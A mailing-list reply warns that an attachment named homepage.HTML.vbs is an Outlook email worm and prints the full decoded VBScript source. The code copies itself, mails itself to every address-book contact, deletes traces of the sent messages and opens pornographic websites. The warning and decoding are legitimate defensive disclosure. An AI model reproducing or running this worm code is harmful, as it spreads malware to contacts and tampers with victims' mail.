Re: Homepage [VIRUS!!!]

[Avi Green]

Patrice GUERLAIS wrote:
> 
> Hi!
> 
> You've got to see this page! It's really cool ;O)
> 
>   ------------------------------------------------------------------------
>                         Name: homepage.HTML.vbs
>    homepage.HTML.vbs    Type: MPEG Video (video/mpeg)
>                     Encoding: quoted-printable

WATCH OUT, this is a VBS worm that's exploiting your addressbook,
Patrice.

Don't launch that attachment if you're on a Windows machine or have
Microsoft Outlook installed.

I've decoded the worm and attached a copy of the worm source code
("worm.vbs.txt") as well as the program I wrote to decode it
("homepage.HTML.pl") and the encrypted source code ("coded_worm.dat"). 
I added the ".txt" extension to "worm.vbs" so no one accidentally
launches it!

--Avi

 ======================================================
 = Avi Green :-) avi at sputnik7.com (-: 212 217-1147 =
 ========  Unix SysAdmin & System Specialist  =========

 http://www.sputnik7.com - chronic online entertainment
  http://www.epitonic.com - Hi Quality Free MP3 Music
     http://www.res.com - The Future of Filmmaking
 http://www.we-deliver.tv - Log on, order in, smoke out
         the best grasses for the online masses

n Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm";)
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm";)
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm";)
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm";)
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
        Set Mapi=Outlook.GetNameSpace("MAPI")
        Set Lists=Mapi.AddressLists
        For Each ListIndex In Lists
                If ListIndex.AddressEntries.Count <> 0 Then
                        ContactCount = ListIndex.AddressEntries.Count
                        For Count= 1 To ContactCount
                                Set Mail = Outlook.CreateItem(0)
                                Set Contact = ListIndex.AddressEntries(Count)
                                Mail.To = Contact.Address
                                Mail.Subject = "Homepage"
                                Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've 
got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
                                Set Attachment=Mail.Attachments
                                Attachment.Add Folder & "\homepage.HTML.vbs"
                                Mail.DeleteAfterSubmit = True
                                If Mail.To <> "" Then
                                Mail.Send
                                WS.regwrite "HKCU\software\An\mailed", "1"
                        End If
                        Next
                End If
        Next
End if
End Functionþ

homepage.HTML.pl
Description: Perl program

coded_worm.dat
Description: Binary data